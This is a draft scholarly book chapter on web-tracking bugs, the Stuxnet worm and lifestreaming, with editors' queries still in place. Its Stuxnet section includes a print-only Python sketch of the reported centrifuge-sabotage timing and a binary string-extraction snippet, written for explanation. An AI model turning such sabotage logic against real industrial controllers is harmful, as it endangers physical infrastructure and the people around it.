behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012). [Eds: please check that the single and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behaviour in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) is generating $189 per user, at [http://www.businessinsider.com/blackboard/google Google] (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011). Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becoming extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into four main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers. (web site operators) Example: [http://www.burstmedia.com/ Burst Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld]&amp;lt;br&amp;gt; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma, 2010)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid attracting too much unwanted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). One can also see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). [Eds: would this final point be better in a footnote?]&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
One of the newer, and perhaps indicative, directions of travel for these web bugs is [http://www.persianstat.ir/ PersianStat], an Iranian web tracking and data analytics service which claims to keep 'an eye on 1091622 websites', and which shows that this new code ecology is not a purely Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would 'not be okay' with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be 'okay' with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent to which users are just not aware of the subterranean depths of their computational devices and the ability of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). This is an issue helpfully illustrated by the next case study, of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name ‘Stuxnet’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’: the first part, 'stu', comes from the (.stub) file, mrxcls.sys; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, such as a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system, which it then plays back to the operators to disguise the fact that it is actually gently causing the centrifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so that an infected system does not exhibit abnormal behaviour and therefore does not raise the alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the act of sabotage, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010). A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Associated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains: &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems, sending commands that disable the warning and safety controls which would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general-purpose attack: it was designed to unload its digital warheads only under specific conditions, against a specific target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
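&lt;br /&gt;
Zetter’s description above can be read as a simple timed state machine, alternating two attack sequences around the nominal frequency. The following is a minimal illustrative sketch in Python of that logic only - not Stuxnet’s actual code, which was written for Siemens PLCs - with all names and the PLC stand-in invented for the purpose: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
import itertools &lt;br /&gt;
&lt;br /&gt;
NOMINAL_HZ = 1064    # nominal IR-1 drive frequency reported by Zetter (2011) &lt;br /&gt;
OVERSPEED_HZ = 1410  # close to the rotor's mechanical limit &lt;br /&gt;
SLOW_HZ = 2          # near-standstill frequency of the second sequence &lt;br /&gt;
&lt;br /&gt;
class FakePLC: &lt;br /&gt;
    '''Stand-in for the frequency-converter interface; it only logs commands.''' &lt;br /&gt;
    def set_frequency(self, hz): &lt;br /&gt;
        print(f'frequency converter set to {hz} Hz') &lt;br /&gt;
&lt;br /&gt;
def sabotage_cycle(plc, cycles=4): &lt;br /&gt;
    # Alternate the two sequences, waiting roughly 27 days between them and &lt;br /&gt;
    # always restoring the nominal frequency afterwards, so each excursion &lt;br /&gt;
    # reads as ordinary wear rather than as an attack. &lt;br /&gt;
    sequences = itertools.cycle([(OVERSPEED_HZ, 15), (SLOW_HZ, 50)]) &lt;br /&gt;
    for _ in range(cycles): &lt;br /&gt;
        hz, minutes = next(sequences) &lt;br /&gt;
        print('wait ~27 days') &lt;br /&gt;
        plc.set_frequency(hz) &lt;br /&gt;
        print(f'hold for {minutes} minutes') &lt;br /&gt;
        plc.set_frequency(NOMINAL_HZ) &lt;br /&gt;
&lt;br /&gt;
sabotage_cycle(FakePLC()) &lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;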
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it, due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm are such that at least thirty people would have had to work on it simultaneously in order to build a worm of this kind (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, one using a set of techniques that were neither public nor known to the developers of the attacked systems, in this case Microsoft and Siemens. In actuality, it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach of its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLC (Programmable Logic Controller) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did’ (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet are: (1) the ability to identify its target precisely, using a number of software-based markers that give away the physical identity of the location. Indeed, the ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) the capability to disengage control systems from physical systems and to effect a stealth infection of the computer system that would fool the operators of the plant (the ‘man-in-the-middle attack’ described above). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, 315, was designed slowly to reduce the speed of the rotors, leading to cracks and failures; the second, larger warhead, 417, manipulated valves in the centrifuge cascades and faked the industrial process control sensor signals by modeling the centrifuges, which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards:[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a) &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The origin of the name Stuxnet is hypothesized from an analysis of the approximately 15,000 lines of programming code. This analysis was a close reading and reconstruction of the programming logic: taking the machine code, disassembling it, and then attempting to convert it into the C programming language. The resulting code could then be analysed for system function calls, timers, and data structures, in order to try to understand what it was doing (Langner, 2011). Indeed, as part of this process a reference to ‘Myrtus’ was discovered, and the link made to Myrtus as ‘an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively’ (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see Table 1).&amp;lt;br&amp;gt; &lt;br /&gt;
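&lt;br /&gt;
The ‘Myrtus’ clue was recovered from printable strings left behind in the binary (note 9 gives the full file path). Extracting such strings is among the simplest steps in this kind of analysis; what follows is a minimal Python sketch of the technique, modelled on the Unix strings utility (the binary examined is whatever file is given on the command line): &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
import re &lt;br /&gt;
import sys &lt;br /&gt;
&lt;br /&gt;
def printable_strings(path, min_len=6): &lt;br /&gt;
    '''Yield runs of printable ASCII bytes from a binary file, as the Unix &lt;br /&gt;
    strings utility does; such runs often include compiler-embedded debug &lt;br /&gt;
    paths of the kind recovered from Stuxnet (see note 9).''' &lt;br /&gt;
    with open(path, 'rb') as f: &lt;br /&gt;
        data = f.read() &lt;br /&gt;
    for match in re.finditer(rb'[\x20-\x7e]{%d,}' % min_len, data): &lt;br /&gt;
        yield match.group().decode('ascii') &lt;br /&gt;
&lt;br /&gt;
# Print any string mentioning 'myrtus' in the given binary. &lt;br /&gt;
for s in printable_strings(sys.argv[1]): &lt;br /&gt;
    if 'myrtus' in s.lower(): &lt;br /&gt;
        print(s) &lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;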
&lt;br /&gt;
&lt;br /&gt;
[[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al., n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan -&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al., n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized against targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But, of course, once the code for undertaking this kind of sophisticated cyberattack is out in the open, it is relatively trivial to decode it and so learn, in a very short time, techniques that would otherwise have taken many years to develop. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit one whose purpose is linked to the collection of data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the 'Tilded' [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The increasing ability of code and software, via computational devices, to covertly monitor, control and mediate, both positively and negatively, is not just a matter of interventions designed to deceive the human and non-human actors that make up these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems, as part of the notion of lifestreams, and more particularly of the quantified self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
I want now to connect these developments in web bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have grown in recent years alongside the expansion of ‘real-time stream’ platforms such as Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', which argues that the: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as 'self-tracking', 'body hacking' or 'self-quantifying'. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This phenomenon of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, and so on is the next step in social media. It closes the loop of personal information online which, although it remains notionally private, is stored and accessed by corporations that wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband]... has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Lifestreams were originally an idea developed by David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), who described them as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and 'compress' large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Gelernter originally described these as ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions in relation to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also micro-streams of short updates, epitomized by Twitter’s text-message-sized updates of 140 characters. Nonetheless, this is still enough space to incorporate a surprising amount of data, particularly when geodata, images, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect his personal data systematically, starting in 1989: ‘So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that. Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them’ (Wolfram, 2012). &lt;br /&gt;
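&lt;br /&gt;
Freeman’s description translates almost directly into a data structure: a time-ordered sequence of documents, stretching from past into future, with a handful of operators defined over it. Here is a minimal sketch using only the Python standard library (the class and method names are mine, not Freeman’s): &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
import bisect &lt;br /&gt;
from dataclasses import dataclass, field &lt;br /&gt;
&lt;br /&gt;
@dataclass(order=True) &lt;br /&gt;
class Document: &lt;br /&gt;
    timestamp: float                     # seconds since the epoch &lt;br /&gt;
    content: str = field(compare=False)  # ordering compares timestamps only &lt;br /&gt;
&lt;br /&gt;
class Lifestream: &lt;br /&gt;
    '''A time-ordered stream of documents, from past through to future; &lt;br /&gt;
    reminders and calendar items simply carry timestamps ahead of now.''' &lt;br /&gt;
    def __init__(self): &lt;br /&gt;
        self._docs = [] &lt;br /&gt;
&lt;br /&gt;
    def store(self, doc): &lt;br /&gt;
        bisect.insort(self._docs, doc)   # keep the stream time-ordered &lt;br /&gt;
&lt;br /&gt;
    def filter(self, predicate): &lt;br /&gt;
        '''Select documents into a new virtual substream on demand.''' &lt;br /&gt;
        return [d for d in self._docs if predicate(d)] &lt;br /&gt;
&lt;br /&gt;
    def summarize(self): &lt;br /&gt;
        '''Compress the stream into a one-line overview.''' &lt;br /&gt;
        if not self._docs: &lt;br /&gt;
            return 'empty stream' &lt;br /&gt;
        return f'{len(self._docs)} documents, latest: {self._docs[-1].content!r}' &lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;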
&lt;br /&gt;
